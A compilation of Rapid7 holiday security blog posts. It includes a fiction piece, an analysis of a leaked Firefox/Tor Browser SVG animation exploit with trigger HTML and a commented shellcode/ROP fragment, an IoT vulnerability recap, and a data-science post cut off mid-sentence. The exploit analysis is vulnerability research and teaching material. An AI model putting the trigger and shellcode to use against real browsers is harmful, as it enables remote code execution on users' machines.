(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Happy Holi-data from Rapid7 Labs! It's been a big year for the Rapid7 elves Labs team. Our nigh 200-node strong Heisenberg Cloud honeypot network has enabled us to bring posts & reports such as The Attacker's Dictionary, Cross-Cloud Adversary Analytics and Mirai botnet tracking to the community, while Project Sonar fueled deep dives into National Exposure as well as ClamAV, fuel tanks and tasty, tasty EXTRABACON. Our final gift of the year is the greatest gift of all: DATA! We've sanitized an extract of our November, 2016 cowrie honeypot data from Heisenberg Cloud. While not the complete data set, it should be good for hours of fun over the holiday break. You can e-mail research [at] rapid7 [dot] com if you have any questions or leave a note here in the comments. While you're waiting for that to download, please enjoy our little Haxmas tale… Once upon a Haxmas eve… CISO Scrooge sat sullen in his office. His demeanor was sour as he reviewed the day's news reports and sifted through his inbox, but his study was soon interrupted by a cheery minion's “Merry HaXmas, CISO!”. CISO Scrooge replied, “Bah! Humbug!” The minion was taken aback. “HaXmas a humbug, CISO?! You surely don't mean it!” “I do, indeed…” grumbled Scrooge. “What is there to be merry about? Every day attackers are compromising sites, stealing credentials and bypassing defenses. It's almost impossible to keep up. What's more, the business units and app teams here don't seem to care a bit about security. So, I say it again ‘Merry HaXmas?' - HUMBUG!” Scrooge's minion knew better than argue and quickly fled to the comforting glow of the pew-pew maps in the security operations center. As CISO Scrooge returned to his RSS feeds his office lights dimmed and a message popped up on his laptop, accompanied by a disturbing “clank” noise (very disturbing indeed since he had the volume completely muted). No matter how many times he dismissed the popup it returned, clanking all the louder. He finally relented and read the message: “Scrooge, it is required of every CISO that the defender spirit within them should stand firm with resolve in the face of their adversaries. Your spirit is weary and your minions are discouraged. If this continues, all your security plans will be for naught and attackers will run rampant through your defenses. All will be lost.” Scrooge barely finished uttering, “Hrmph. Nothing but a resourceful security vendor with a crafty marketing message. My ad blocker must be misconfigured and that bulb must have burned out.” “I AM NO MISCONFIGURATION!” appeared in the message stream, followed by, “Today, you will be visited by three cyber-spirits. Expect their arrivals on the top of each hour. This is your only chance to escape your fate.” Then, the popup disappeared and the office lighting returned to normal. Scrooge went back to his briefing and tried to put the whole thing out of his mind. The Ghost of HaXmas Past CISO Scrooge had long finished sifting through news and had moved on to reviewing the first draft of their PCI DSS ROC[i]. His eyes grew heavy as he combed through the tome until he was startled with a bright green light and the appearance of a slender man in a tan plaid 1970's business suit holding an IBM 3270 keyboard. “Are you the cyber-spirit, sir, whose coming was foretold to me?”, asked Scrooge. “I am!”, replied the spirit. “I am the Ghost of Haxmas Past! Come, walk with me!” As Scrooge stood up they were seemingly transported to a room full of mainframe computers with workers staring drone-like into green-screen terminals. “Now, this was security, spirit!” exclaimed Scrooge. “No internet…No modems…Granular RACF[ii] access control…” (Scrooge was beaming almost as bright as the spirit!) “So you had been successful securing your data from attackers?”, asked the spirit. “Well, yes, but this is when we had control! We had the power to give or deny anyone access to critical resources with a mere series of arcane commands.” As soon as he said this, CISO Scrooge noticed the spirit moving away and motioning him to follow. When he caught up, the scene changed to cubicle-lined floor filled with desktop PCs. “What about now, were these systems secure?”, inquired the spirit. “Well, yes. It wasn't as easy as it was with the mainframe, but as our business tools changed and we started interacting with clients and suppliers on the internet we found solutions that helped us protect our systems and networks and give us visibility into the new attacks that were emerging.”, remarked CISO Scrooge. “It wasn't easy. In fact, it was much harder than the mainframe, but the business was thriving: growing, diversifying and moving into new markets. If we had stayed in a mainframe mindset we'd have gone out of business.” The spirit replied, “So, as the business evolved, so did the security challenges, but you had resources to protect your data?” “Well, yes. But, these were just PCs. No laptops or mobile phones. We still had control!”, noted Scrooge. “That may be,” noted the spirit, “but if we continued our journey, would this not be the pattern? Technology and business practices change, but there have always been solutions to security problems coming at the same pace?” CISO Scrooge had to admit that as he looked back in his mind, there had always been ways to identify and mitigate threats as they emerged. They may not have always been 100% successful, but the benefits of the “new” to the business were far more substantial than the possible issues that came with it. The Ghost of Haxmas Present As CISO Scrooge pondered the spirit's words he realized he was back at his desk, his screen having locked due to the required inactivity timeout.  He gruffed a bit (he couldn't understand the 15-minute timeout when at your desk as much as you can't) and fumbled 3 attempts at his overly-complex password to unlock the screen before he was logged back in. His PCI DSS ROC was minimized and his browser was on a MeTube video (despite the site being blocked on the proxy server). He knew he had no choice but to click “play”. As he did, it seemed to be a live video of the Mooncents coffee shop down the street buzzing with activity. He was seamlessly transported from remote viewer to being right in the shop, next to a young woman in bespoke, authentic, urban attire, sipping a double ristretto venti half-soy nonfat decaf organic chocolate brownie iced vanilla double-shot gingerbread frappuccino. Amongst the patrons were people on laptops, tablets and phones, many of them conducting business for CISO's company. “Dude. I am the spirit of Haxmas Present”, she said, softly, as her gaze fixated upon a shadowy figure in the corner. CISO Scrooge turned his own gaze in that direction and noticed a hoodie-clad figure with a sticker-laden laptop. Next to the laptop was a device that looked like a wireless access point and Scrooge could just barely hear the figure chuckling to himself as his fingers danced across the keyboard. “Is that person doing what I think he's doing?”, Scrooge asked the spirit. “Indeed,” she replied. “He's setup a fake Mooncents access point and is intercepting all the comms of everyone connected to it.” Scrooges' eyes got wide as he exclaimed “This is what I mean! These people are just like sheep being led to the shearer. They have no idea what's happening to them! It's too easy for attackers to do whatever they want!” As he paused for a breath, the spirit gestured to a woman who just sat down in the corner and opened her laptop, prompting Scrooge to go look at her screen. The woman did work at CISO's company and she was in Mooncents on her company device, but — much to the surprise of Scrooge — as soon as she entered her credentials, she immediately fired up the VPN Scrooge's team had setup, ensuring that her communications would not be spied upon. The woman never once left her laptop alone and seemed to be very aware of what she needed to do to stay as safe as possible. “Do you see what is happening?”, asked the spirit? “Where and how people work today are not as fixed as it was in the past. You have evolved your corporate defenses to the point that attackers need to go to lengths like this or trick users through phishing to get what they desire.” “Technology I can secure. But how do I secure people?!”, sighed Scrooge. “Did not this woman do what she needed to keep her and your company's data safe?”, asked the spirit. “Well, yes. But it's so much more work!”, noted Scrooge. “I can't install security on users, I have to make them aware of the threats and then make it as easy as possible for them to work securely no matter where they are!”[iii]</sup As soon as he said this, he realized that this was just the next stage in the evolution of the defenses he and his team had been putting into place. The business-growing power inherent in this new mobility and the solid capabilities of his existing defenses forced attackers to behave differently and he understood that he and his team probably needed to as well. The spirit gave a wry, ironic grin at seeing Scrooge's internal revelation. She handed him an infographic titled “Ignorance & Want” that showcased why it was important to make sure employees were well-informed and to also stay in tune with how users want to work and make sure his company's IT offerings were as easy-to-use and functional as all the shiny “cloud” apps. The Ghost of Haxmas Future As Scrooge took hold of the infographic the world around him changed. A dark dystopian scene faded into view. Buildings were in shambles and people were moving in zombie-like fashion in the streets. A third, cloaked spirit appeared next to him and pointed towards a disheveled figure hulking over a fire in a barrel. An “eyes” emoji appeared on the OLED screen where the spirit's face should have been. CISO Scrooge didn't even need to move closer to see that it was a future him struggling to keep warm to survive in this horrible wasteland. “Isn't this a bit much?”, inquired Scrooge. The spirit shrugged and a “whatever” emoji appeared on the screen. Scrooge continued, “I think I've got the message. Business processes will keep evolving and moving faster and will never be tethered and isolated again. I need to stay positive and constantly evolve — relying on psychology, education as well as technology — to address the new methods attackers will be adopting. If I don't, it's ‘game over'.” The spirit's screen flashed a “thumbs up” emoji and CISO Scrooge found himself back at his desk, infographic strangely still in hand with his Haxmas spirt fully renewed. He vowed to keep Haxmas all the year through from now on. [i] Payment Card Industry Data Security Standard Report on Compliance [ii] http://www-03.ibm.com/systems/z/os/zos/features/racf/ [iii] Scrooge eventually also realized he could make use of modern tools such as Insight IDR to combine security & threat event data with user behavior analysis to handle the cases where attackers do successfully breach users.

12 Days of HaXmas: A Fireside Foray into a Firefox Fracas

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Towards the end of November, the Tor community was shaken up by the revelation of an previously unknown vulnerability being actively exploited against pedo^H^H^H^H Tor Browser users. Some further drama unfolded regarding who the source for the exploit may be, and I received questions from several reporters who wanted every single detail I could give them. While I did not participate in commenting at the time, I'll say everything I will ever say about it now: Yes, I'm aware of a very similar exploit which targeted Firefox No, I didn't write it Largely lost among all the noise are the nuances of the vulnerability and the exploit itself, which I know the author put his heart and soul into. If anonymous entrants are ever retroactively awarded Pwnies, I'd like to put his unsaid name into the hat. In this part of the 12 Days of HaXmas, I wanted to offer a high level overview to some of the more interesting parts of both the vulnerability—which in my opinion doesn't fit cleanly into any classic category—and the exploit. I'm not going to dive into all of the gory details for a couple of reasons. Firstly, timing. Had this been leaked earlier in the year, I might have been able to do the analysis part some justice. Second, while verbose technical expositions certainly have their place, a blog is not the right spot. The content might take take another 12 days to cover, and for those seeking to learn from it, I feel your own analysis of the exploit coupled with lots of dirty work in a debugger would be your best option. In that case, hopefully this can offer you some direction along the way. The Discovery It would be remiss of me if I didn't begin by pointing out that no fuzzer was used in the discovery of this vulnerability. The only tools employed were the Woboq Code Browser (Woboq Code Browser — Explore C code on the web), WinDBG, a sharp mind, and exhaustive effort. The era of low-hanging fruit is largely over in my opinion. Don't be the gorilla, be the lemur, climb that tree. The Vulnerability In the following snippet from nsSMILTimeContainer.cpp, the pointer p is initialized to the beginning of the mMilestoneEntries array. void nsSMILTimeContainer::NotifyTimeChange() { // Called when the container time is changed with respect to the document // time. When this happens time dependencies in other time containers need to // re-resolve their times because begin and end times are stored in container // time. // // To get the list of timed elements with dependencies we simply re-use the // milestone elements. This is because any timed element with dependents and // with significant transitions yet to fire should have their next milestone // registered. Other timed elements don't matter. const MilestoneEntry* p = mMilestoneEntries.Elements(); #if DEBUG uint32_t queueLength = mMilestoneEntries.Length(); #endif while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) { mozilla::dom::SVGAnimationElement* elem = p->mTimebase.get(); elem->TimedElement().HandleContainerTimeChange(); MOZ_ASSERT(queueLength == mMilestoneEntries.Length(), "Call to HandleContainerTimeChange resulted in a change to the " "queue of milestones"); ++p; } } Now, consider the following two examples: Exhibit One <html> <head> <title> Exhibit One </title> </head> <body> <svg id='foo'> <animate id='A' begin='1s' end='10s' /> <animate begin='A.end + 5s' dur='15s' /> </svg> </body> </html> Exhibit Two <html> <head> <title> Exhibit Two </title> </head> <body> <svg id='foo'> <animate id='A' begin='1s' end='10s' /> </svg> <svg id='bar'> <animate begin='A.end + 5s' dur='15s' /> </svg> </body> </html> In these examples, for each <svg> element that uses <animate>, an nsSMILTimeContainer object is assigned to it in order to perform time book keeping for the animations (<animateTransform> or <animateMotion> will also have the same behavior).  The epoch of each container is the time since the creation of the <svg> element it is assigned to relative to the creation of the page.  The nsSMILTimeContainer organizes each singular event in an animation with an entry for each in the mMilestoneEntries member array. See: nsSMILTimeContainer.h — DXR In Exhibit One, the mMilestoneEntries array will contain four entries: one for both the beginning and ending of 'A', in addition to another two, one being relative to A's completion (A.end + 5s), and the other demarcating the end of the animation, in this case 30 seconds (A.end + 5s + 15s). In Exhibit Two we see two independent <svg> elements.  In this example, two separate nsSMILTimeContainer objects will be created, each of course having it's own mMilestoneEntries array. The exploit makes a single call to the function pauseAnimation(), which in turn triggers entry into the NotifyTimeChange() method.  nsSMILTimeContainer::NotifyTimeChange() proceeds to iterate through all entries in the mMilestoneEntries array, retrieving each individual entries nsSMILTimedElement object, after which it calls the object's HandleContainerTimeChange() method.  After some time, this method will end up making a call to the NotifyChangedInterval() method of of the nsSMILTimedElement object.  In NotifyChangedInterval(), HandleChangedInterval() will be entered if the animation being processed has a milestone relative to another animation.  In Exhibit Two, bar's beginning is relative to the element A belonging to foo, so HandleChangedInterval() will be called. Within HandleChangedInterval(), a call to nsSMILTimeValueSpec::HandleChangedInstanceTime() will inevitably be made.  This method determines if the current animation element and the one it has a dependency on are contained within the same nsSMILTimeContainer object.  If so, as is the case with Exibit One, the pauseAnimations() function basically lives up to it's name and pauses them.  In Exhibit Two, the animations do not share the same nsSMILTimeContainer object, so additional bookkeeping is required in order to maintain synchronization.  This occurs, with subsequent calls to nsSMILTimedElement::UpdateInstanceTime() and nsSMILTimedElement::UpdateCurrentInterval() being made, and nothing too interesting is to be seen, though we will be revisiting it very shortly. Deeper down the rabbit hole ... What about the case of three or more animation elements with relative dependencies? Looking at the exploit, we see four animations split unequally among two containers.  We can modify Exhibit Two using details gleaned from the exploit to arrive at the following example. Exhibit Three <html> <head> <title> Exhibit Three </title> </head> <body> <script> var foo = document.getElementById('foo'); foo.pauseAnimations(); </script> <svg id='foo'> <animate id='A' begin='1s' end='5s' /> <animate id='B' begin='10s' end='C.end' dur='5s' /> </svg> <svg id='bar'> <animate id='C' begin='0s' end='A.end/> </svg> </body> </html> In this example, C's ending is relative to A's end, so we end up in nsSMILTimedElement::UpdateCurrentInterval() again, except that a different branch is followed based on the example's milestones: if (mElementState == STATE_ACTIVE) { // The interval is active so we can't just delete it, instead trim it so // that begin==end. if (!mCurrentInterval->End()->SameTimeAndBase(*mCurrentInterval->Begin())) { mCurrentInterval->SetEnd(*mCurrentInterval->Begin()); NotifyChangedInterval(mCurrentInterval, false, true); } // The transition to the postactive state will take place on the next // sample (along with firing end events, clearing intervals etc.) RegisterMilestone(); NotifyChangedInterval() is called to resolve any milestones relative to other animations for C.  Within foo, B has milestones relative to C in bar.  This results in a recursive branch along the same code path which ultimately hits UpdateCurrentInterval(), which in turn sets the state of the nsSMILTimedElement.  mElementState can be one of four possible values: STATE_STARTUP STATE_WAITING STATE_ACTIVE STATE_POSTACTIVE all of which perfectly describes their own respective meanings.  In Exhibit Three, B's beginning is set to occur after it's ending is set (C.end == A.end == 5s).  Since it will never start, the code marks it as STATUS_POSTACTIVE.  This results in the following code within the UpdateCurrentInterval() method creating a new interval and setting it as current. if (GetNextInterval(GetPreviousInterval(), mCurrentInterval, beginTime, updatedInterval)) { if (mElementState == STATE_POSTACTIVE) { MOZ_ASSERT(!mCurrentInterval, "In postactive state but the interval has been set"); mCurrentInterval = new nsSMILInterval(updatedInterval); mElementState = STATE_WAITING; NotifyNewInterval(); } With this occurring, UpdateCurrentInterval() now makes a call to the RegisterMilestone() method.  This was not the case in Exhibit Two.  With a new interval having been created, the method will add a new entry in the mMilestoneEntries array of containerA's nsSMILTimeContainer object, resulting in the array being freed and reallocated elsewhere, leaving the pointer p from nsSMILTimeContainer::NotifyTimeChange() referencing invalid memory. Exploitation Overview Just because the pointer p in NotifyTimeChange() can be forced to point to free memory doesn't mean it's all over.  Firefox overwrites freed memory with 0x5a5a5a5a, which effectively mitigates a lot of classic UaF scenarios.  Secondly, there is no way to allocate memory in the freed region after the milestone array is relocated.  Given these conditions, it's becoming clear that the vulnerability cannot be exploited like a classic use-after-free bug.  If you forced me to categorize it and come up with a new buzz word as people are so apt to in this industry, I might call it a dangling index, or an iterator run-off.  Regardless of silly names, the exploit utilizes some artful trickery to overcome the hurdles inherent in the vulnerability.  As I mentioned at the offset, for the sake of brevity, I'm going to be glossing over a lot of the details with regards to heap determinism (the terms "heap grooming" and "heap massaging" irritate me more than the word "moist"). In the first step, the exploit defragments the heap by spraying 0x80 byte blocks of ArrayBuffers, and another 0x80 of milestone arrays.  Each of the milestone arrays is filled to capacity, and then one additional element is added to each.  This causes the arrays to be reallocated elsewhere, leaving 0x80 holes.  After filling these holes with vulnerable milestone arrays, assuming the last element of the array is the one that triggers the vulnerability, there is now a high probability that the next iteration of the NotifyTimeChange() loop will point within one of the 0x80 ArrayBuffer's that were allocated first.  It is important that the last element be the one to trigger the bug, as otherwise, the memory would be freed and overwritten before an attacker could take advantage of it. The next obstacle in the process is bypassing the object reference count which, under normal circumstances, would cause the loop to exit.  Even if this were a full technical exposition, I'd leave this part as an exercise to the reader because of reasons.  I invite you to figure it out on your own, because it's both quite clever and critical to the success of the exploit.  Those pesky reasons though.  Seasoned exploitation engineers will see it quickly, and astute students will have truly learned when they unravel the knot. _I'd like to think that this is a good hint, but the only certainty is that it comes up on my 3 AM debugging session playlist a lot_ In any case, after the exploit does it's thing, the exit condition of the loop while (p < mMilestoneEntries.Elements() + mMilestoneEntries.Length()) will never be reached, and instead the loop will continue to iterate infinitely.  While this is great news, it also means that an attacker is unable to continue executing code.  The solution to this is one of the more brilliant aspects of this exploit, that being the use of a Javascript worker thread. var worker = new Worker('cssbanner.js'); With the worker thread, Javascript can continue being executed while the infinite loop within the main thread keeps spinning.  In fact, it's used to keep tabs on a lot of magical heap manipulation happening in the background, and to selectively exit the loop when need be.  From here, the exploit leverages a series of heap corruptions into a r/w primitive, and bypasses ASLR by obtaining the base address of xul.dll from said corruptions by parsing the files DOS header in memory.  This, along with resolving imports, is the main purpose of the PE(b,a) function in the leaked exploit. With ASLR defeated, all that lies ahead is defeating Data Execution Prevention, as the Tor browser doesn't feature any sort of sandbox technology.  The exploit handles this beautifully by implementing an automatic ROP chain generation function, which can locate the addresses of required gadgets amongst multiple versions of Firefox/Tor browser.  After constructing the chain, the following shellcode is appended (I've converted all addresses to base 16 for readability and added comments): ropChain[i++] = 0xc4819090; // add esp, 800h ropChain[i++] = 0x0800; ropChain[i++] = 0x5050c031; // xor eax, eax ; push eax ; push eax ropChain[i++] = 0x5b21eb50; // push eax ; jmp eip+0x23 ; pop ebx ropChain[i++] = 0xb8505053; // push ebx ; push eax ; push eax ropChain[i++] = CreateThread; // mov eax, kernel32!CreateThread ropChain[i++] = 0xb890d0ff; // call eax ropChain[i++] = arrBase + 0x2040; // mov eax, arrBase+0x2040 ropChain[i++] = 0x5f58208b; // mov esp, dword ptr [eax] ; pop eax ; pop edi ropChain[i++] = 0xbe905d58; // pop eax ; pop ebp ropChain[i++] = 0xffffff00; // mov esi, 0xffffff00 ropChain[i++] = 0x000cc2c9; // ret 0x0c ropChain[i++] = 0xffffdae8; // call eip+0x21 ropChain[i++] = 0x909090ff; // placeholder for payload address The shellcode basically allocates stack space and makes a call to CreateThread with the address of the final payload, which is obtained via the jmp eip x023 ; pop ebx line, as it's argument.  It next performs stack cleanup and exits the current infinite NotifyTimeChange() loop to ensure clean process continuation.  At least, it's supposed to.  Initial findings I've read from other researchers seem to indicate that it does not continue cleanly when used against Tor browser.  I need to investigate this myself at the first lull in the holiday festivities. I hope I managed to prove that exploiting buffer overflows should be an art -Solar Designer That wraps this up for now. Check back for updates in the future as I continue analysis on it. If you have questions about anything, feel free to ask either here or find me on Twitter @iamwilliamwebb. Happy holidays! References Original leaked exploit: [tor-talk] Javascript exploit

12 Days of HaXmas: Rudolph the Machine Learning Reindeer

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Sam the snowman taught me everything I know about reindeer [disclaimer: not actually true], so it only seemed logical that we bring him back to explain the journey of machine learning. Wait, what? You don't see the correlation between reindeer and machine learning? Think about it, that movie had everything: Yukon Cornelius, the Bumble, and of course, Rudolph himself. And thus, in sticking with the theme of HaXmas 2016, this post is all about the gifts of early SIEM technology, “big data”, and a scientific process. SIEM and statistical models – Rudolph doesn't get to play the reindeer games Just as Rudolph had conformist Donner's gift of a fake black nose promising to cover his glowing monstrosity [and it truly was impressive to craft this perfect deception technology with hooves], information security had the gift of early SIEM technology promising to analyze every event against known bad activity to spot malware. The banking industry had just seen significant innovation in the use of statistical analysis [a sizable portion of what we now call “analytics”] for understanding the normal in both online banking and payment card activities. Tracking new actions and comparing them to what is typical for the individual takes a great deal of computing power and early returns in replicating fraud prevention's success were not good. SIEM had a great deal working against it when everyone suddenly expected a solution designed solely for log centralization to easily start empowering more complex pattern recognition and anomaly detection. After having witnessed, as consumers, the fraud alerts that can come from anomaly detection, executives starting expecting the same from their team of SIEM analysts. Except, there were problems: the events within an organization vary a great deal more than the login, transfer, and purchase activities of the banking world, the fraud detection technology was solely dedicated to monitoring events in other, larger systems, and SIEM couldn't handle both data aggregation and analyzing hundreds of different types of events against established norms. After all, my favorite lesson from data scientists is that “counting is hard”. Keeping track of the occurrence of every type of event for every individual takes a lot of computing power and understanding of each type of event. After attempting to define alerts for transfer size thresholds, port usage, and time-of-day logins, no one understood that services like Skype using unpredictable ports and the most privileged users regularly logging in late to resolve issues would cause a bevy of false positives. This forced most incident response teams to banish advanced statistical analysis to the island of misfit toys, like an elf who wants to be a dentist. “Big Data” – Yukon Cornelius rescues machine learning from the Island of Misfit Toys There is probably no better support group friend for the bizarre hero, Yukon Cornelius, than “big data” technologies. Just as NoSQL databases, like Mongo, to map-reduce technologies, like Hadoop, were marketed as the solution to every, conceivable challenge, Yukon proudly announced his heroism to the world. Yukon carried a gun he never used, even when fighting Bumble, and “big data” technology is varied and each kind needs to be weighed against less expensive options for each problem. When jumping into a solution technology-first, most teams attempting to harness “big data” technology came away with new hardware clusters and mixed results; insufficient data and security experts miscast as data experts still prevent returns on machine learning from happening today. However, with the right tools and the right training, data scientists and software engineers have used “big data” to rescue machine learning [or statistical analysis, for the old school among you] from its unfit-for-here status. Thanks to “big data”, all of the original goals of statistical analysis in SIEMs are now achievable. This may have led to hundreds of security software companies marketing themselves as “the machine learning silver bullet”, but you just have to decide when to use the gun and when to use the pick axe. If you can cut through the hype to decide when the analytics are right and for which problems machine learning is valuable, you can be a reason that both Hermey, the dentist, and Rudolph, the HaXmas hero, reach their goal. Visibility - only Santa Claus could get it from a glowing red nose But just as Rudolph's red nose didn't make Santa's sleigh fly faster, machine learning is not a magic wand you wave at your SIEM to make eggnog pour out. That extra foggy Christmas Eve couldn't have been foggy all over the globe [or it was more like the ridiculous Day After Tomorrow], but Santa knows how to defy physics to reach the entire planet in a single night, so we can give him the benefit of the doubt and assume he knew when and where he needed a glowing red ball to shine brighter than the world's best LED headlights. I know that I've held a pretty powerful Maglite in the fog and still couldn't see a thing, so I wouldn't be able to get around Mt. Washington armed with a glowing reindeer nose. Similarly, you can't just hand a machine learning toolkit to any security professional and expect them to start finding the patterns they should care about across those hundreds of data types mentioned above. It takes the right tools, an understanding of the data science process, and enough security domain expertise to apply machine learning to the attacker behaviors well hidden within our chaotically normal environments. Basic anomaly detection and the baselining of users and assets against their peers should be embedded in modern SIEM and EDR solutions to reveal important context and unusual behavior. It's the more focused problems and data sets that demand the kind of pattern recognition within the characteristics of a website or PHP file only the deliberate development of machine learning algorithms can properly address.

12 Days of HaXmas: 2016 IoT Research Recap

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. As we close out the end of the year, I find it important to reflect on the IoT vulnerability research conducted during 2016 and what we learned from it. There were several exciting IoT vulnerability research projects conducted by Rapid7 employees in 2016, which covered everything from lighting automation solutions to medical devices. Through this research, we want to give the "gift" of more information about IoT security to the community. In the spirit of the celebrating the holidays, let's recap and celebrate each of these projects and some of the more interesting findings. Comcast XFINITY Home Security System 2016 opened with a research project on the Comcast XFINITY Home Security System which was published in January 2016. Phil Bosco, a member of the Rapid7's Global Services pen test team, targeted his XFINITY home security systems for evaluation. During testing, Phil discovered that by creating a failure condition in the 2.4 GHz radio frequency band used by the Zigbee communication protocol, the Comcast XFINITY Home Security System would fail open, with the base station failing to recognize or alert on a communications failure with the component sensors. This interesting finding showed us that if communication to the systems sensors is lost, the system would fail to recognize that lost communication. Additionally, this failure also prevented the system from properly alarming when the sensor detected a condition such as a open door or window. This vulnerability allowed anyone capable of interrupting the 2.4 GHz Zigbee communication between sensor and base station to effectively silence the system. Comcast has since fixed this issue. Osram Sylvania Lightify Automated Lighting Since automated lighting has become very popular I decided to examine the OSRAM Sylvania LIGHTIFY automated lighting solution. This research project consisted of looking at both the Home and Pro (enterprise) versions. This project ended up revealing a total of nine issues, four in the Home version and five in the Pro. The Pro version had the most interesting of these results which included identifying issues consisting of persistent Cross Site Scripting (XSS) and Weak default WPA2 pre-shared keys (PSKs). The XSS vulnerabilities we found had two entry points with the most entertaining one being an out of band injection using WiFi Service Set Identifier (SSID) to deliver the XSS attack into the Pro web management interface. A good explanation of this type of attack delivery method is explained in a Whiteboard Wednesday video I recorded. Next, the finding that I would consider the most worrisome is the WPA PSK issue. Default passwords have been a scourge of IoT recently. Although, in this case the default password are different across every Pro device produces, closer examination of the WPA PSK revealed they were easily cracked. So how did this happen? Well, in this case the PSK was only eight characters long, which is considered very short for a PSK, and it only used characters that were hexadecimal lowercase (abcdef0123456789) which makes the number of combinations or key space much easier to brute force  and can allow a malicious actor to capture a authentication handshake and brute force it offline in only a few hours. Bluetooth Low Energy (BLE) Trackers You ever get curious about those little Bluetooth low energy (BLE) tracker dongles you can hang on your key chain that helps you locate your keys if you misplace them? So did I, but my interest went a little further then finding my lost keys. I was interested in how they worked and what, if any, security issues could be associated to their use or misuse. I purchased several different brands and started testing their ecosystem, yes ecosystem, that is all of the services that make an IoT solution function, which often includes the hardware, mobile applications and cloud APIs. One of the most fascinating aspects of these devices is the crowd GPS concept. How does that work? Let's say you attach one of the devices to your bicycle and it gets stolen. Every time that bicycle passes within close proximity to another user of that specific product their cell phone will detect your dongle on the bicycle and send the GPS location to the cloud allowing you to identify its location. Kind of neat and I expect it works well if you have an area with a good saturation of users, but if you live in a rural area there's less chance of that working as well. During this project we identified several interesting vulnerabilities related to the tracking identifiers and GPS tracking. For example, we found that the devices' tracking ID was easy identified and in a couple cases was directly related to the BLE physical address. Combining that with some cloud API vulnerabilities, we were able to track a user using the GPS of their device. Additionally, in couple cases we were able to poison the GPS data for other devices. With weak BLE pairing, we were also able to gain access to a couple of the devices and rename them and set off their location alarms which drained the small batteries for the devices. Animas OneTouch Ping Insulin Pump Rapid7's Jay Radcliffe, a member of the Global Services team and security researcher at Rapid7, found several fascinating vulnerabilities while testing the Animas OneTouch Ping insulin pump. Jay is renowned for his medical device research, which has a personal aspect to it as he is diabetic. In the case of the Animas OneTouch, Jay found and reported three vulnerabilities which include cleartext communication, weak pairing between remote and pump, and replay attack vulnerability. During this research project it was determined that these vulnerabilities could be used to potentially dispense insulin remotely, which could impact the safety and health of the user. Jay worked closely with the manufacturer to help create effective mitigations for these vulnerabilities, which can be used to reduce or eliminate the risk. Throughout the project, there was positive collaboration between Jay, Rapid7 and Johnson & Johnson and patients were notified prior to disclosure. Conclusion: Stepping back and taking a holistic look at all of the vulnerabilities found during these research projects, we can notice a pattern of common issues including: Lack of communication encryption Poor device pairing Confidential data (such as passwords) stored within mobile applications Vulnerability to replay attacks Weak default passwords Cloud API and device management web services vulnerable to common web vulnerabilities These findings are not a surprise and appear to be issues we commonly encounter when examining an IoT product's ecosystem. What is the solution to resolving these issues then? First, IoT manufactures can easily apply some basic testing across these areas to quickly identify and fix vulnerabilities on products prior to going to market. Second, we as end users can change default passwords, such as the standard login password and WiFi WPA PSK, to protect our devices from many forms of compromise. It is also important to note that these IoT research projects are just a few examples of the dedication that Rapid7 and its employees have in regards to securing the world of IoT.  These research projects allow us to continually expand our knowledge around IoT security and vulnerabilities. By working closely with vendors to identify and mitigate issues, we can continue to help those vendors in expanding their working knowledge of security, which will flow into future products. Our work also allows us to share this knowledge with consumers so they can make better choices and mitigate common risks that are often found within IoT products.

12 Days of HaXmas: The One Present This Data Scientist Wants This Holiday Season

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. “May you have all the data you need to answer your questions – and may half of the values be corrupted!” - Ancient Yiddish curse This year, Christmas (and therefore Haxmas) overlaps with the Jewish festival of Chanukah. The festival commemorates the recapture of the Second Temple. As part of the resulting cleaning and sanctification process, candles were required to burn continuously for seven days – but there was only enough oil for one. Thanks to the intervention of God, that one day of oil burned for eight days, and the resulting eight-day festival was proclaimed. Unfortunately despite God getting involved in everything from the edibility of owls (it's in Deuteronomy, look it up) to insufficient stocks of oil, there's no record of divine intervention to solve for insufficient usable data, and that's what we're here to talk about. So pull up a chair, grab yourself a plate of latkes and let's talk about how you can make data-driven security solutions easier for everyone. Data-Driven Security As security problems have grown more complex and widespread, people have attempted to use the growing field of data science to diagnose issues, both on the macro level (industry-wide trends and patterns found in the DBIR) and the micro (responding to individual breaches). The result is Data-Driven Security, covered expertly by our Chief Data Scientist, Bob Rudis, in the book of the same name. Here at Rapid7, our Data Science team has been working on everything from systems to detect web shells before they run (see our blog post about webshells) to internal projects that improve our customers' experience. As a result, we've seen a lot of data sources from a lot of places, and have some thoughts on what you can do to make data scientists' problem-solving easier before you even know you have an issue. Make sure data is available Chanukah has just kicked off and you want two things: to eat fritters and apply data science to a bug, breach or feature request. Luckily you've got a lot of fritters and a lot of data – but how much data do you actually have? People tend to assume that data science is all about the number of observations. If you've got a lot of them, you can do a lot; only a few and you can only do a little. Broadly-speaking, that's true, but the span of time data covers and the format it takes are also vitally important. Seasonal effects are a well-studied phenomenon in human behavior and, by extension, in data (which one 